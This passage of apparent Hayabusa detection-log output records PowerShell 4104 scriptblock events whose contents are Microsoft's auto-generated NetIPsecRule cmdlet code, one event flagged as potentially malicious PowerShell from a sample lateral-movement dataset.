$false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { 